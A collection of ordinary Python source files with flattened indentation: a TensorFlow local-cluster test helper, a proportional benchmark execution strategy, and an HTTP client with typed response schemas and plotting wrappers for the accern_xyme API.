worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
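# Usage sketch for get_node_def_from_graph (illustrative only; the node name
# is made up):
#
#   graph_def = ops.get_default_graph().as_graph_def()
#   node = get_node_def_from_graph("my_op_name", graph_def)
#   if node is not None:
#     print(node.op, node.input)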
|
ProportionalExecutionStrategy.py
|
# -*- coding: utf-8 -*-
import random
import datetime
import threading
from ..config.MeasurementType import MeasurementType
from ..config.ConfigurationManager import ConfigurationManager
from ..results.ResultsManager import ResultsManager
from .ExecutionContext import ExecutionContext
from ..benchmarks.BenchmarkInstance import BenchmarkInstance
from ..benchmarks.BenchmarkSuiteInstance import BenchmarkSuiteInstance
from ..results.BenchmarkResult import BenchmarkResult
from .ExecutionContext import ExecutionContext
from .ExecutionStrategy import ExecutionStrategy
from .ResultAggregator import ResultAggregator
class ProportionalExecutionStrategy(ExecutionStrategy):
def __init__(self, configuration, results,
execution, benchmarks):
super().__init__(configuration, results, execution, benchmarks)
self.__running = False
self.__aggregation = None
self.__ticks_per_transaction = 0
self.__last_executed_time = None
self.__stop_time = None
self.__benchmark_count = None
self.__only_benchmark = None
self.__timeout = None
self.__aggregation = ResultAggregator(results, benchmarks)
def start(self, callback=None):
        if self.__running:
            if callback is not None:
                callback(None)
            return
self.__running = True
self.__aggregation.start()
self.__calculate_proportional_ranges()
if self._configuration.measurement_type == MeasurementType.Nominal:
self.__ticks_per_transaction = 1000.0 / self._configuration.nominal_rate
# Initialize and start
def inner(_suite, _callback):
try:
_context = ExecutionContext(_suite, self.__aggregation, self)
                _suite.set_up(_context, _callback)
# Execute benchmarks
self.__execute(_callback)
except Exception as err:
# Abort if initialization failed
self.__aggregation.report_error(err)
_callback(err)
return
for suite in self._suites:
threading.Thread(
target=inner, args=(suite, callback)
).start()
@property
def is_stopped(self):
return not self.__running
def stop(self, callback=None):
# Interrupt any wait
if self.__timeout is not None:
self.__timeout.do_run = False
self.__timeout = None
if self.__running:
self.__running = False
self.__aggregation.stop()
if self._execution:
self._execution.stop()
# Stop and cleanup execution
def inner(_suite, _callback):
try:
_suite.tear_down(_callback)
except Exception as err:
if _callback:
_callback(err)
for suite in self._suites:
threading.Thread(
target=inner, args=(suite, callback)
).start()
else:
if callback:
callback(None)
def __calculate_proportional_ranges(self):
total_proportion = 0
for benchmark in self._active_benchmarks:
total_proportion += benchmark.proportion
start_range = 0
for benchmark in self._active_benchmarks:
normalized_proportion = benchmark.proportion / total_proportion
benchmark.start_range = start_range
benchmark.end_range = start_range + normalized_proportion
start_range += normalized_proportion
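        # Worked example (illustrative only): with two active benchmarks whose
        # proportions are 1 and 3, total_proportion is 4, so the first gets
        # the range [0.0, 0.25) and the second [0.25, 1.0). A uniform random
        # draw in [0, 1) then selects each benchmark in proportion to its
        # weight.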
def __choose_benchmark_proportionally(self):
proportion = random.random()
        # Return the single benchmark whose range contains the draw (or None).
        return next(
            (b for b in self._active_benchmarks if b.with_range(proportion)),
            None)
def __execute_delay(self, delay, callback):
def inner():
self.__timeout = None
self.__last_executed_time = datetime.datetime.now()
callback(None)
        # delay is given in milliseconds; threading.Timer expects seconds.
        self.__timeout = threading.Timer(delay / 1000.0, inner)
self.__timeout.start()
def __execute_benchmark(self, benchmark, callback):
try:
if benchmark is None or benchmark.is_passive:
# Delay if benchmarks are passive
self.__execute_delay(500, callback)
else:
# Execute active benchmark
def inner(_err=None):
# Process force continue
if _err and self._configuration.force_continue:
self.__aggregation.report_error(_err)
_err = None
# Increment counter
now = datetime.datetime.now()
if _err is None:
self.__aggregation.increment_counter(1, now)
# Introduce delay to keep nominal rate
if _err is None and self._configuration.measurement_type == MeasurementType.Nominal:
delay = self.__ticks_per_transaction - (
1000 * (now.timestamp() - self.__last_executed_time.timestamp()))
self.__last_executed_time = now
if delay > 0:
self.__execute_delay(delay, callback)
else:
callback(_err)
else:
self.__last_executed_time = now
callback(_err)
benchmark.execute(inner)
except Exception as err:
# Process force continue
if self._configuration.force_continue:
self.__aggregation.report_error(err)
callback(None)
else:
callback(err)
def __execute(self, callback=None):
self.__last_executed_time = datetime.datetime.now()
duration = self._configuration.duration if self._configuration.duration > 0 else 365 * 24 * 36000
self.__stop_time = datetime.datetime.now().timestamp() * 1000 + duration * 1000
self.__benchmark_count = len(self._benchmarks)
self.__only_benchmark = self._benchmarks[0] if self.__benchmark_count == 1 else None
# Execute benchmarks
def inner():
benchmark = self.__only_benchmark if self.__only_benchmark is not None \
else self.__choose_benchmark_proportionally()
called = 0
try:
def _callback(_err):
                    thread = threading.Thread(target=callback, args=(_err,))
thread.start()
thread.join()
self.__execute_benchmark(benchmark, _callback)
            except Exception as err:
                # Bind err as a default argument: the name is cleared when the
                # except block exits, so a late-called lambda would otherwise
                # raise NameError.
                self.stop(lambda err2, first_err=err: callback(first_err))
        # __stop_time is in milliseconds, so scale the timestamp to match.
        while self.__running and \
                self.__last_executed_time.timestamp() * 1000 < self.__stop_time:
inner()
self.stop(None)
|
legacy.py
|
from typing import (
Any,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
Union,
)
import io
import os
import sys
import copy
import json
import time
import threading
import contextlib
import collections
from io import BytesIO
import requests
import pandas as pd
from typing_extensions import TypedDict, Literal, overload
import quick_server
from accern_xyme.v2.util import (
get_file_upload_chunk_size,
get_max_retry,
get_retry_sleep,
maybe_timestamp,
df_to_csv,
setup_matplotlib,
get_progress_bar,
get_file_hash,
)
API_VERSION = 2
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
SOURCE_TYPE_MULTI = "multi"
SOURCE_TYPE_CSV = "csv"
SOURCE_TYPE_IO = "io"
SOURCE_TYPE_PRICES = "prices"
SOURCE_TYPE_USER = "user"
ALL_SOURCE_TYPES = [
SOURCE_TYPE_MULTI,
SOURCE_TYPE_CSV,
SOURCE_TYPE_IO,
SOURCE_TYPE_PRICES,
SOURCE_TYPE_USER,
]
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
UPLOAD_IN_PROGRESS = "in_progress"
UPLOAD_DONE = "done"
UPLOAD_START = "start"
FILTER_SYSTEM = "system"
FILTER_USER = "user"
FILTERS = [FILTER_SYSTEM, FILTER_USER]
PLOT_PKL = "pkl"
PLOT_CSV = "csv"
PLOT_OUTPUT = "output"
PLOT_META = "meta"
PRED_LATEST = "latest" # using the current snapshot of the model
PRED_HISTORIC = "historic" # using the historic data
PRED_PREDICTED = "predicted" # using csv
PRED_PROBA = "proba_outcome" # using historic probabilities
# using filtered historic probabilities
PRED_PROBA_FILTERED = "proba_outcome_filter"
PRED_PROBS = "probs" # using historic probabilities
PRED_VALID = "validation" # using validation data
VersionInfo = TypedDict('VersionInfo', {
"apiVersion": Union[str, int],
"callerApiVersion": str,
"time": str,
"version": str,
"xymeVersion": str,
})
UserLogin = TypedDict('UserLogin', {
"token": str,
"success": bool,
"permissions": List[str],
})
UserInfo = TypedDict('UserInfo', {
"company": str,
"hasLogout": bool,
"path": str,
"username": str,
})
MaintenanceInfo = TypedDict('MaintenanceInfo', {
"isAfterupdate": bool,
"isMaintenance": bool,
"queuedMaintenance": bool,
})
HintedMaintenanceInfo = TypedDict('HintedMaintenanceInfo', {
"isAfterupdate": bool,
"isMaintenance": bool,
"pollHint": float,
"queuedMaintenance": bool,
})
JobCreateResponse = TypedDict('JobCreateResponse', {
"jobId": str,
"name": str,
"path": str,
"schema": str,
})
JobBackupResponse = TypedDict('JobBackupResponse', {
"jobId": str,
})
SchemaResponse = TypedDict('SchemaResponse', {
"schema": str,
})
SourceResponse = TypedDict('SourceResponse', {
"sourceId": str,
})
JobStartResponse = TypedDict('JobStartResponse', {
"job": Optional[str],
"exit": Optional[int],
"stdout": Optional[List[str]],
})
JobRenameResponse = TypedDict('JobRenameResponse', {
"name": str,
"path": str,
})
JobPauseResponse = TypedDict('JobPauseResponse', {
"success": bool,
})
JobStatusInfo = TypedDict('JobStatusInfo', {
"allKinds": List[str],
"allTabs": List[str],
"buttons": List[str],
"empty": bool,
"isUserJob": bool,
"name": str,
"path": str,
"plotOrderTypes": List[str],
"pollHint": float,
"schema": str,
"status": str,
"tickers": List[str],
"timeTotal": float,
"timeStart": Optional[str],
"timeEnd": Optional[str],
"timeEstimate": Optional[str],
"canRename": bool,
"permalink": str,
"symjob": bool,
})
JobListItemInfo = TypedDict('JobListItemInfo', {
"deployTime": str,
"jobId": str,
"name": str,
"path": str,
"kinds": List[str],
"timeTotal": float,
"timeStart": Optional[str],
"timeEnd": Optional[str],
"timeEstimate": Optional[str],
"status": str,
"canDelete": bool,
"canPause": bool,
"canUnpause": bool,
"permalink": str,
})
JobListResponse = TypedDict('JobListResponse', {
"jobs": Dict[str, List[JobListItemInfo]],
"counts": Dict[str, int],
"allKinds": List[str],
"allStatus": List[str],
"pollHint": float,
"isReadAdmin": bool,
})
StdoutMarker = int
StdoutLine = Tuple[StdoutMarker, str]
StdoutResponse = TypedDict('StdoutResponse', {
"lines": List[StdoutLine],
"messages": Dict[str, List[Tuple[str, List[StdoutLine]]]],
"exceptions": List[Tuple[str, List[StdoutLine]]],
})
PredictionsResponse = TypedDict('PredictionsResponse', {
"columns": List[str],
"dtypes": List[str],
"values": List[List[Union[str, float, int]]],
})
Approximate = TypedDict('Approximate', {
"mean": float,
"stddev": float,
"q_low": float,
"q_high": float,
"vmin": float,
"vmax": float,
"count": int,
})
ApproximateImportance = TypedDict('ApproximateImportance', {
"name": str,
"importance": Approximate,
})
ApproximateUserExplanation = TypedDict('ApproximateUserExplanation', {
"label": Union[str, int],
"weights": List[ApproximateImportance],
})
DynamicPredictionResponse = TypedDict('DynamicPredictionResponse', {
"predictions": Optional[PredictionsResponse],
"explanations": Optional[List[ApproximateUserExplanation]],
"stdout": StdoutResponse,
})
ShareList = TypedDict('ShareList', {
"shareable": List[Tuple[str, str]],
})
ShareablePath = TypedDict('ShareablePath', {
"name": str,
"path": str,
})
ShareResponse = TypedDict('ShareResponse', {
"job": str,
})
CreateSourceResponse = TypedDict('CreateSourceResponse', {
"multiSourceId": str,
"sourceId": str,
"jobSchema": Optional[str],
})
CreateSource = TypedDict('CreateSource', {
"source": 'SourceHandle',
"multi_source": 'SourceHandle',
})
CreateInputResponse = TypedDict('CreateInputResponse', {
"inputId": str,
})
LockSourceResponse = TypedDict('LockSourceResponse', {
"newSourceId": str,
"immutable": bool,
"jobSchema": Optional[str],
"multiSourceId": Optional[str],
"sourceSchemaMap": Dict[str, Dict[str, Any]],
})
LockSource = TypedDict('LockSource', {
"new_source": 'SourceHandle',
"immutable": bool,
"multi_source": Optional['SourceHandle'],
"source_schema_map": Dict[str, Dict[str, Any]],
})
SourceInfoResponse = TypedDict('SourceInfoResponse', {
"dirty": bool,
"immutable": bool,
"sourceName": Optional[str],
"sourceType": Optional[str],
})
SourceSchemaResponse = TypedDict('SourceSchemaResponse', {
"sourceSchema": Dict[str, Any],
"sourceInfo": SourceInfoResponse,
"pollHint": float,
})
SystemLogResponse = TypedDict('SystemLogResponse', {
"logs": Optional[List[StdoutLine]],
})
SourceItem = TypedDict('SourceItem', {
"id": str,
"name": str,
"type": Optional[str],
"help": str,
"immutable": bool,
})
SourcesResponse = TypedDict('SourcesResponse', {
"systemSources": List[SourceItem],
"userSources": List[SourceItem],
})
InspectQuery = Optional[Dict[str, Any]]
InspectItem = TypedDict('InspectItem', {
"clazz": str,
"leaf": bool,
"value": Union[None, str, List[Any]],
"extra": str,
"collapsed": bool,
})
InspectResponse = TypedDict('InspectResponse', {
"inspect": InspectItem,
"pollHint": float,
})
RedisQueueSizes = TypedDict('RedisQueueSizes', {
"wait": int,
"regular": int,
"busy": int,
"result": int,
"failed": int,
"paused": int,
})
JobsOverview = TypedDict('JobsOverview', {
"current": Dict[str, Dict[str, int]],
"queues": RedisQueueSizes,
"pausedJobs": Optional[List[Dict[str, str]]],
})
OverviewResponse = TypedDict('OverviewResponse', {
"jobs": JobsOverview,
"requests": Dict[str, int],
"sessions": Optional[List[Dict[str, Any]]],
"workers": Dict[str, List[str]],
})
InputDetailsResponse = TypedDict('InputDetailsResponse', {
"name": Optional[str],
"path": str,
"extension": Optional[str],
"inputId": str,
"lastByteOffset": Optional[int],
"size": Optional[int],
"progress": Optional[str],
})
UploadResponse = TypedDict('UploadResponse', {
"name": Optional[str],
"path": str,
"extension": Optional[str],
"inputId": str,
"lastByteOffset": Optional[int],
"size": Optional[int],
"progress": Optional[str],
"exists": bool,
})
InputItem = TypedDict('InputItem', {
"name": Optional[str],
"path": str,
"file": str,
"immutable": bool,
})
InputsResponse = TypedDict('InputsResponse', {
"systemFiles": List[InputItem],
"userFiles": List[InputItem],
})
EmptyDict = TypedDict('EmptyDict', {})
AggMetricPlot = TypedDict('AggMetricPlot', {
"inner": List[List[Union[str, float]]],
"plot": str,
"color": str,
"name": str,
"ticker": Optional[str],
"count": int,
"cat": bool,
"catValues": Optional[List[Union[str, float]]],
})
RangedPlot = TypedDict('RangedPlot', {
"xrange": List[str],
"yrange": List[float],
"lines": List[AggMetricPlot],
"kind": Literal["time"],
})
PlotCoords = List[Tuple[float, float]]
CoordPlot = TypedDict('CoordPlot', {
"name": str,
"color": str,
"coords": PlotCoords,
})
RangedCoords = TypedDict('RangedCoords', {
"xaxis": str,
"yaxis": str,
"xrange": List[float],
"yrange": List[float],
"coords": List[CoordPlot],
"kind": Literal["coord"],
})
MetricResponse = TypedDict('MetricResponse', {
"lines": Union[EmptyDict, RangedCoords, RangedPlot],
"pollHint": float,
})
MetricListResponse = TypedDict('MetricListResponse', {
"metrics": List[List[str]],
"selectedPlots": List[List[str]],
"hiddenPlots": List[List[str]],
"pollHint": float,
})
MetricListInfo = TypedDict('MetricListInfo', {
"metrics": List[List[str]],
"selected_plots": List[List[str]],
"hidden_plots": List[List[str]],
})
SummaryResponse = TypedDict('SummaryResponse', {
"messages": Dict[str, List[Tuple[str, List[StdoutLine]]]],
"exceptions": List[Tuple[str, List[StdoutLine]]],
"lastEvent": Optional[Tuple[str, str, str]],
"rows": Optional[int],
"rowsTotal": Optional[int],
"features": Optional[Dict[str, int]],
"droppedFeatures": Optional[Dict[str, int]],
"dataStart": Optional[str],
"dataHigh": Optional[str],
"dataEnd": Optional[str],
"pollHint": float,
})
SummaryInfo = TypedDict('SummaryInfo', {
"stdout": 'StdoutWrapper',
"last_event": Optional[Tuple[str, str, str]],
"rows": Optional[int],
"rows_total": Optional[int],
"features": Optional[Dict[str, int]],
"dropped_features": Optional[Dict[str, int]],
"data_start": Optional[pd.Timestamp],
"data_high": Optional[pd.Timestamp],
"data_end": Optional[pd.Timestamp],
})
JobStdoutResponse = TypedDict('JobStdoutResponse', {
"lines": List[StdoutLine],
"pollHint": float,
})
NotesResponse = TypedDict('NotesResponse', {
"usage": Dict[str, bool],
"roles": Dict[str, str],
"rolesRenamed": Dict[str, str],
"dummyColumns": List[str],
"stats": Dict[str, Dict[str, Any]],
"isRunnable": bool,
"suggestions": Dict[str, List[Dict[str, str]]],
"isPreview": bool,
"error": bool,
})
NotesInfo = TypedDict('NotesInfo', {
"usage": Dict[str, bool],
"roles": Dict[str, str],
"roles_renamed": Dict[str, str],
"dummy_columns": List[str],
"stats": Dict[str, Dict[str, Any]],
"is_runnable": bool,
"suggestions": Dict[str, List[Dict[str, str]]],
"is_preview": bool,
"error": bool,
})
PreviewNotesResponse = TypedDict('PreviewNotesResponse', {
"notes": Optional[NotesResponse],
})
StrategyResponse = TypedDict('StrategyResponse', {
"strategies": List[str],
"pollHint": float,
})
BacktestResponse = TypedDict('BacktestResponse', {
"pyfolio": Optional[Dict[str, Any]],
"output": Optional[List[StdoutLine]],
"errMessage": Optional[str],
"pollHint": float,
})
SegmentResponse = TypedDict('SegmentResponse', {
"segments": List[Tuple[int, Optional[str], Optional[str]]],
"pollHint": float,
})
SimplePredictionsResponse = TypedDict('SimplePredictionsResponse', {
"isClf": bool,
"columns": List[str],
"predsName": str,
"predictions": List[List[Union[str, float, int]]],
"allPredictions": List[List[Union[str, float, int]]],
"pollHint": float,
})
ForceFlushResponse = TypedDict('ForceFlushResponse', {
"success": bool,
})
JobColumnsResponse = TypedDict('JobColumnsResponse', {
"columns": List[str],
})
JobRegisterResponse = TypedDict('JobRegisterResponse', {
"success": bool,
})
HidePlotResponse = TypedDict('HidePlotResponse', {
"success": bool,
})
SelectPlotsResponse = TypedDict('SelectPlotsResponse', {
"selectedPlots": List[List[str]],
})
DataPlotListResponse = TypedDict('DataPlotListResponse', {
"dataPlots": List[List[str]],
"noOrdering": bool,
"hiddenPlots": List[List[str]],
"pollHint": float,
"selectedPlots": List[List[str]],
})
DataPlotListInfo = TypedDict('DataPlotListInfo', {
"data_plots": List[List[str]],
"selected_plots": List[List[str]],
"hidden_plots": List[List[str]],
})
def predictions_to_df(preds: PredictionsResponse) -> pd.DataFrame:
df = pd.DataFrame(preds["values"], columns=preds["columns"])
if "date" in df.columns: # pylint: disable=unsupported-membership-test
df["date"] = pd.to_datetime(df["date"])
return df
def maybe_predictions_to_df(
preds: Optional[PredictionsResponse]) -> Optional[pd.DataFrame]:
if preds is None:
return None
return predictions_to_df(preds)
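# Usage sketch for predictions_to_df (illustrative only; the response dict
# below is hand-written example data, not real API output):
#
#   preds: PredictionsResponse = {
#       "columns": ["date", "score"],
#       "dtypes": ["datetime64[ns]", "float64"],
#       "values": [["2020-01-01", 0.3], ["2020-01-02", 0.7]],
#   }
#   df = predictions_to_df(preds)  # "date" is parsed via pd.to_datetime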
class AccessDenied(Exception):
pass
# *** AccessDenied ***
class StdoutWrapper:
def __init__(self, stdout: StdoutResponse) -> None:
self._lines = stdout["lines"]
self._messages = stdout["messages"]
self._exceptions = stdout["exceptions"]
def full_output(self) -> str:
return "\n".join((line for _, line in self._lines))
def get_messages(self) -> Dict[str, List[Tuple[str, List[StdoutLine]]]]:
return self._messages
def get_exceptions(self) -> List[Tuple[str, List[StdoutLine]]]:
return self._exceptions
def __str__(self) -> str:
return self.full_output()
def __repr__(self) -> str:
return self.full_output()
# *** StdoutWrapper ***
class MetricWrapper(collections.abc.Sequence):
def get_xaxis(self) -> str:
raise NotImplementedError()
def get_yaxis(self) -> str:
raise NotImplementedError()
def get_xrange(self) -> Tuple[Any, Any]:
raise NotImplementedError()
def get_yrange(self) -> Tuple[Any, Any]:
raise NotImplementedError()
def is_coordinates(self) -> bool:
raise NotImplementedError()
def plot(self,
figsize: Optional[Tuple[int, int]] = None,
use_ranges: bool = False) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
draw = False
if figsize is not None:
plt.figure(figsize=figsize)
if len(self) == 1:
plt.title(self[0].get_name())
plt.xlabel(self.get_xaxis())
if self.is_coordinates():
plt.ylabel(self.get_yaxis())
if use_ranges:
def is_proper_range(v_range: Tuple[Any, Any]) -> bool:
return v_range[0] != v_range[1]
x_range = self.get_xrange()
if is_proper_range(x_range):
plt.xlim(x_range)
y_range = self.get_yrange()
if is_proper_range(y_range):
plt.ylim(y_range)
for plot in self:
plot.plot(show=False)
draw = True
if draw:
plt.show()
# *** MetricWrapper ***
class AggregatePlot:
def __init__(self, plot: AggMetricPlot) -> None:
self._id = plot["plot"]
self._name = plot["name"]
self._color = plot["color"]
self._ticker = plot["ticker"]
self._is_cat = plot["cat"]
self._cat_values = plot["catValues"]
self._count = plot["count"]
cols = ["date", "vmean", "vstddev", "q_low", "q_high", "vmin", "vmax"]
df = pd.DataFrame(plot["inner"], columns=cols)
if not df.empty:
df["date"] = pd.to_datetime(df["date"])
self._df = df
def get_id(self) -> str:
return self._id
def get_name(self) -> str:
return self._name
def get_color(self) -> str:
return self._color
def get_ticker(self) -> Optional[str]:
return self._ticker
def is_categorical(self) -> bool:
return self._is_cat
def get_categorical_values(self) -> Optional[List[Union[str, float]]]:
return self._cat_values
def get_aggregate_count(self) -> int:
return self._count
def is_single(self) -> bool:
return self._count == 1
def get_single_df(self) -> pd.DataFrame:
if not self.is_single():
raise ValueError("metric is aggregate")
res = self._df[["date", "vmean"]].copy()
if self._is_cat:
assert self._cat_values is not None
mapping = dict(enumerate(self._cat_values))
res["vmean"] = res["vmean"].map(mapping)
if self._ticker is None:
res = res.set_index(["date"])
else:
res["ticker"] = self._ticker
res = res.set_index(["ticker", "date"])
return res.rename(columns={"vmean": self._id})
def get_full_df(self) -> pd.DataFrame:
res = self._df.copy()
if self._ticker is None:
res = res.set_index(["date"])
else:
res["ticker"] = self._ticker
res = res.set_index(["ticker", "date"])
return res.rename(columns={
"vmean": f"{self._id}_mean",
"vstddev": f"{self._id}_stddev",
"q_low": f"{self._id}_q_low",
"q_high": f"{self._id}_q_high",
"vmin": f"{self._id}_min",
"vmax": f"{self._id}_max",
})
def plot(self, show: bool = True) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
df = self._df
if self.is_single():
plt.plot(
df["date"], df["vmean"], color=self._color, label=self._name)
else:
plt.plot(
df["date"], df["vmean"], color=self._color, label=self._name)
plt.fill_between(
df["date"], df["q_low"], df["q_high"], interpolate=True,
color=self._color, alpha=0.25)
plt.plot(df["date"], df["q_low"], color=self._color, alpha=0.25)
plt.plot(df["date"], df["q_high"], color=self._color, alpha=0.25)
plt.plot(
df["date"], df["vmin"], linestyle="dashed", color=self._color)
plt.plot(
df["date"], df["vmax"], linestyle="dashed", color=self._color)
if show:
plt.show()
# *** AggregatePlot ***
class MetricPlot(MetricWrapper):
def __init__(self, plot: RangedPlot) -> None:
self._xrange = (
pd.to_datetime(plot["xrange"][0]),
pd.to_datetime(plot["xrange"][-1]),
)
self._yrange = (plot["yrange"][0], plot["yrange"][-1])
        self._plots = [AggregatePlot(line) for line in plot["lines"]]
@overload
def __getitem__(self, index: int) -> AggregatePlot:
...
@overload
def __getitem__(self, index: slice) -> List[AggregatePlot]:
...
def __getitem__(self,
index: Union[int, slice],
) -> Union[AggregatePlot, List[AggregatePlot]]:
return self._plots[index]
def __len__(self) -> int:
return len(self._plots)
def get_xaxis(self) -> str:
return "date"
def get_yaxis(self) -> str:
return "value"
def get_xrange(self) -> Tuple[Any, Any]:
return self._xrange
def get_yrange(self) -> Tuple[Any, Any]:
return self._yrange
def is_coordinates(self) -> bool:
return False
# *** MetricPlot ***
class CoordinatePlot:
def __init__(self, plot: CoordPlot) -> None:
self._name = plot["name"]
self._color = plot["color"]
self._df = pd.DataFrame(plot["coords"], columns=["x", "y"])
def get_name(self) -> str:
return self._name
def get_color(self) -> str:
return self._color
def get_df(self) -> pd.DataFrame:
return self._df.copy()
def plot(self, show: bool = True) -> None:
import matplotlib.pyplot as plt
setup_matplotlib()
df = self._df
plt.plot(df["x"], df["y"], color=self._color, label=self._name)
if show:
plt.show()
# *** CoordinatePlot ***
class MetricCoords(MetricWrapper):
def __init__(self, plot: RangedCoords) -> None:
self._xaxis = plot["xaxis"]
self._yaxis = plot["yaxis"]
self._xrange = (plot["xrange"][0], plot["xrange"][-1])
self._yrange = (plot["yrange"][0], plot["yrange"][-1])
        self._plots = [CoordinatePlot(coord) for coord in plot["coords"]]
@overload
def __getitem__(self, index: int) -> CoordinatePlot:
...
@overload
def __getitem__(self, index: slice) -> List[CoordinatePlot]:
...
def __getitem__(
self,
index: Union[int, slice],
) -> Union[CoordinatePlot, List[CoordinatePlot]]:
return self._plots[index]
def __len__(self) -> int:
return len(self._plots)
def get_xaxis(self) -> str:
return self._xaxis
def get_yaxis(self) -> str:
return self._yaxis
def get_xrange(self) -> Tuple[Any, Any]:
return self._xrange
def get_yrange(self) -> Tuple[Any, Any]:
return self._yrange
def is_coordinates(self) -> bool:
return True
# *** MetricCoords ***
class XYMELegacyClient:
def __init__(
self,
url: str,
user: Optional[str],
password: Optional[str],
token: Optional[str]) -> None:
self._url = url.rstrip("/")
if user is None:
user = os.environ.get("ACCERN_USER")
self._user = user
if password is None:
password = os.environ.get("ACCERN_PASSWORD")
self._password = password
self._token: Optional[str] = token
self._last_action = time.monotonic()
self._auto_refresh = True
self._permissions: Optional[List[str]] = None
def get_version(legacy: bool) -> int:
server_version = self.get_server_version(legacy)
version = server_version.get("apiVersion", "v0")
if isinstance(version, str):
version = int(version.lstrip("v"))
return int(version)
try:
self._api_version = min(get_version(False), API_VERSION)
except ValueError:
self._api_version = min(get_version(True), API_VERSION)
self._init()
def get_api_version(self) -> int:
return self._api_version
def _init(self) -> None:
if self._token is None:
self._login()
return
res = cast(UserLogin, self._request_json(
METHOD_GET, "/init", {}, capture_err=False))
if not res["success"]:
raise AccessDenied("init was not successful")
self._token = res["token"]
self._permissions = res["permissions"]
def get_permissions(self) -> List[str]:
if self._permissions is None:
self._init()
assert self._permissions is not None
return self._permissions
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
self.set_auto_refresh(old_refresh)
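    # Usage sketch for bulk_operation (illustrative only; client and jobs are
    # hypothetical): auto refresh is switched off for the duration of the
    # block and restored afterwards, avoiding redundant refreshes when many
    # requests are issued in a row.
    #
    #   with client.bulk_operation():
    #       for job in jobs:
    #           job.do_something()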
def _raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> BytesIO:
retry = 0
while True:
try:
return self._fallible_raw_request_bytes(
method, path, args, add_prefix, api_version)
except requests.ConnectionError:
if retry >= get_max_retry():
raise
time.sleep(get_retry_sleep())
retry += 1
def _raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
file_resets = {}
can_reset = True
if files is not None:
for (fname, fbuff) in files.items():
if hasattr(fbuff, "seek"):
file_resets[fname] = fbuff.seek(0, io.SEEK_CUR)
else:
can_reset = False
def reset_files() -> bool:
if files is None:
return True
if not can_reset:
return False
for (fname, pos) in file_resets.items():
files[fname].seek(pos, io.SEEK_SET)
return True
retry = 0
while True:
try:
return self._fallible_raw_request_json(
method, path, args, add_prefix, files, api_version)
except requests.ConnectionError:
if retry >= get_max_retry():
raise
if not reset_files():
raise
time.sleep(get_retry_sleep())
except AccessDenied as adex:
if not reset_files():
raise ValueError(
"cannot reset file buffers for retry") from adex
raise adex
retry += 1
def _fallible_raw_request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
api_version: Optional[int]) -> BytesIO:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
if method == METHOD_GET:
req = requests.get(url, params=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return BytesIO(req.content)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_POST:
req = requests.post(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return BytesIO(req.content)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
raise ValueError(f"unknown method {method}")
def _fallible_raw_request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
if method != METHOD_FILE and files is not None:
raise ValueError(
f"files are only allow for post (got {method}): {files}")
req = None
try:
if method == METHOD_GET:
req = requests.get(url, params=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(url, data=args, files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
})
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
